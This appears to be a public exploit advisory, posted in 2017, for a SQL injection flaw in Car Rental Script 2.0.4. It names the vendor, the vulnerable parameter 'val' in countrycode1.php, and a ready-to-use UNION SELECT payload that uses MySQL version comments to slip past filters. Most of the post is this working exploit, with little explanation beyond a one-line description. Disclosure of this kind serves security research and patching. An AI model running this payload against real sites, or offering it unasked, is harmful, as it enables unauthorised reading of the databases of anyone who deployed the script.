Home / os / winmobile

Car Rental Script 2.0.4 SQL Injection

Posted on 12 December 2017

# # # # # # Exploit Title: Car Rental Script 2.0.4 - SQL Injection # Dork: N/A # Date: 10.12.2017 # Vendor Homepage: https://www.phpscriptsmall.com/ # Software Link: https://www.phpscriptsmall.com/product/car-rental-script/ # Version: 2.0.4 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # 1) # http://localhost/[PATH]/countrycode1.php?val=[SQL] # # -1'++/*!07777UNION*/+/*!07777SELECT*/+@@version--+- # # # # # # #

 

TOP